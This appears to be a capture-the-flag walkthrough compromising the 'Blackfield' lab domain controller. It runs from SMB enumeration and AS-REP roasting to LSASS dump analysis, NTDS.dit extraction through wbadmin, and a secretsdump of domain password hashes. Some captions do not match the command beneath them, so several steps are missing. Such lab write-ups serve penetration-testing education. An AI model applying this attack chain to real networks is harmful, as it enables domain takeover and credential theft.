$ nmap -sV -sC -PN -oA blackfield_nmap -p- 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-04 22:37 CEST
Nmap scan report for 10.10.10.192
Host is up (0.022s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-05 03:39:11Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
| smb2-time:
| date: 2025-08-05T03:39:18
|_ start_date: N/A
Based on the scan results above, the target looks like a standard domain controller with no outside-facing web services available for enumeration.
There is an open SMB server on the target. Used smbclient with a null session to enumerate all available shares:
$ smbclient -N -L //10.10.10.192/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Of the available shares above, forensic and profiles are most interesting. forensic isn't accessible, but profile is, and contains what appears to be a list of user profiles for the domain:
$ smbclient -N //10.10.10.192/profiles$
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jun 3 18:47:12 2020
.. D 0 Wed Jun 3 18:47:12 2020
AAlleni D 0 Wed Jun 3 18:47:11 2020
ABarteski D 0 Wed Jun 3 18:47:11 2020
ABekesz D 0 Wed Jun 3 18:47:11 2020
ABenzies D 0 Wed Jun 3 18:47:11 2020
ABiemiller D 0 Wed Jun 3 18:47:11 2020
...
Having a list of potential users in the domain is very helpful and simplifies enumerating the domain further by a lot.
Foothold
The simplest way to an account takeover is to enumerate the list of users and look for accounts that are vulnerable to ASREPRoasting. Unlike kerberoasting, ASREPRoasting doesn't require having access to a domain account, and unlike password spraying it's also a much easier attack to carry out.
Used impacket-GetNPUsers to enumerate the list of users for any that are ASREPRoastable:
$ impacket-GetNPUsers blackfield.local/ -dc-ip 10.10.10.192 -no-pass -usersfile users.txt | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:7e0a052bb8bb4023c492cf3833a8198e$3e8355a83f6df1897e9b02f65d59a63958a6940d9a2ffcecb0931f987e176ba009c3fff72d611fc7ec491c98de8de7c84ac2d99b63e7ce4ffd3883f035e00a2dc4ac2efe50e765fc7beb6839eb07e7322bec40e8114970cc1948c227f1db0811ad88dec1265dc3f9d11079c7d976761276680cf6bb20a7cf778b61e6d703dabee55c781fe7aa4819b8824e5fc231d9344a94aed045b8fcbb47427e0fe89a64a0c048b48b5b899d5fbd8205c651b87257fe5c7e5d56f730dba968c897f0b8aa9525f21cf4a986e4205ee4f854fa2133a56ae017761f1f4db0a7e716d8dfdbcb915eb325fae7a8e0f3b30956969b04f6e17b0e8f58
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
Of the user profiles found on the SMB share, there are three valid usernames: audit2020, support and svc_backup. Of these, only support doesn't have Kerberos preauthentication enabled, making it vulnerable to ASREPRoasting.
Used Hashcat in mode 18200 to crack the hash above:
$ bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
...
INFO: Done in 00M 09S
Loaded the results into BloodHound and used the support@blackfield.local account as a starting point.
The query First Degree Object Control returns a ForceChangePassword privilege over audit2020:
Used rpcclient as support to change the password for audit2020:
$ smbclient -U blackfield.local\\audit2020 //10.10.10.192/forensic
Password for [BLACKFIELD.LOCAL\audit2020]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 14:03:16 2020
.. D 0 Sun Feb 23 14:03:16 2020
commands_output D 0 Sun Feb 23 19:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools D 0 Sun Feb 23 14:39:08 2020
The names of the folders in the share describe well what they contain. The share looks like it was left over from an audit.There isn't much of interest in commands_output and tools. The memory_analysis folder contains zipped process memory dumps collected during the audit, including a memory dump of the LSASS process, which might contain credentials.
Used pypykatz to analyze the memory dump and extract credentials. Found the NT hash for user svc_backup:
*Evil-WinRM* PS C:\Users\svc_backup> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
The backup privilege makes for an easy win as it allows svc_backup to take a backup of the NTDS.dit database and recover the Administrator password hash.
There are several ways of exfiltrating NTDS.dit. A relatively straight-forward way that doesn't rely on external tools is using the wbadmin utility that already available on the target:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo "Y" | wbadmin start backup -backuptarget:\\dc01\c$\users\svc_backup -include:c:\windows\ntds
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Note: The backed up data cannot be securely protected at this destination.
Backups stored on a remote shared folder might be accessible by other
people on the network. You should only save your backups to a location
where you trust the other users who have access to the location or on a
network that has additional security precautions in place.
Retrieving volume information...
This will back up (C:) (Selected Files) to \\dc01\c$\users\svc_backup.
Do you want to start the backup operation?
[Y] Yes [N] No Y
The backup operation to \\dc01\c$\users\svc_backup is starting.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
The backup of volume (C:) completed successfully.
Summary of the backup operation:
------------------
The backup operation successfully completed.
The backup of volume (C:) completed successfully.
Log of files successfully backed up:
C:\Windows\Logs\WindowsServerBackup\Backup-09-08-2025_02-56-22.log
Once the backup is created, NTDS.dit can be extracted from it by selectively restoring it. wbadmin refences backups by IDs, which can be found in the output from wbadmin get versions:
*Evil-WinRM* PS C:\Users\svc_backup> echo "Y" | wbadmin start recovery -version:08/09/2025-02:56 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:c:\users\svc_backup -notrestoreacl
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Retrieving volume information...
You have chosen to recover the file(s) c:\windows\ntds\ntds.dit from the
backup created on 8/8/2025 7:56 PM to c:\users\svc_backup.
Preparing to recover files...
Do you want to continue?
[Y] Yes [N] No Y
Successfully recovered c:\windows\ntds\ntds.dit to c:\users\svc_backup\.
The recovery operation completed.
Summary of the recovery operation:
--------------------
Recovery of c:\windows\ntds\ntds.dit to c:\users\svc_backup\ successfully completed.
Total bytes recovered: 18.00 MB
Total files recovered: 1
Total files failed: 0
NTDS.dit is encrypted with a key that is stored in the SYSTEM database. Both files are needed for dumping the contents of NTDS.dit. The latter can be dumped from the registry with the reg utility:
$ impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
Impacket v0.13.0.dev0+20250808.101048.c62a52e - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:b50575181ae5720a2d7a6a73c12c3764:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...
Used the NT hash in the list above to connect to the target using Evil-WinRM as Administrator:
